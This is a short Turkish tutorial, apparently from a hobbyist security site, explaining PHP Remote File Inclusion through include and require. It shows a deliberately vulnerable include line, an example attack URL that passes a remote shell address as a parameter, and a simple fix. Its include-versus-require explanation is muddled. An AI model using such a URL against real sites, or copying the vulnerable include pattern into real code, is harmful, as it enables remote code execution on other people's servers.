|
|
 |
Remote File Inclusion: Uzaktan dosya dahil etme anlamına gelmektedir.
RFI bug bulunurken bazı parametrelere dikkat edilir, bunlar:
INCLUDE / INCLUDE ONCE: Bu kod ile uzaktan dosya dahil edilir. Uzun satırlar alan kodlar bu komutla başka sayfada kodlanmış olarak gösterilerek tek satıa indirgenir.
REQUIRE / REQUIRE ONCE: Bu kodda Include kodunun yaptığı işlevi gerçekleştirir. Fakat include ile kodlanmış bir sayfada çağrılan (dahil edilen) dosya bulunamazsa PHP yorumlayıcımız bu kodun olduğu satırı hata mesajı göndererek atlar ve sayfanın diğer kalan kodlarını yorumlamaya devam eder fakat include komutundan sonra require komutuda kullanılmışsa; çağrılan dosya bulunamadığı taktirde bir hata verir ve yorumlamayı durdurur.
Require"in include"dan farkı budur.
Bu parametrelerin kullanımı sırasında " $ " işareti yardımıyla uzaktan kod çağrılabilir.
Örnek olarak aşağıdaki kodları inceleyelim:
include ("$Emre/admin/BLUETIMELINE.php");
Burada " $ " işareti bulunan parametreyi ele alalım. Hatalı kodlamadan dolayı uzaktan dosya çağırmak mümkündür.
Bu dosyaları BLUETIMELINE.php dosyasındaki kodlar olarak varsayalım.
İlk parametreyi kullanarak RFI oluşturulabilmektedir. ( Emre )
Bu kod ile örnek bir saldırı satırı oluşturalım.
http://www.bluetimeline.com/patch/BLUETIMELINE.php?Emre=SHELL+ADRESI?
Varsayılan ayarlarda bir değişilik yapılmamış ise bunların çalışması beklenir.
Pekala şimdi açığı nasıl kapatabiliriz? Ona gelelim..
$Emre = "./";
include ("$Emre/admin/BLUETIMELINE.php");
BLUETIMELINE.php dosyamızın bu şekilde kodlandığını düşünürsek RFI açığının gerçekleştiremeyeceğimizi anlayabiliriz. |
|
 |
|
|
|
Site yönetimi ile iletişim için :
ose_35_@hot... |
|
|
|
|
|
 |
|
|
|
|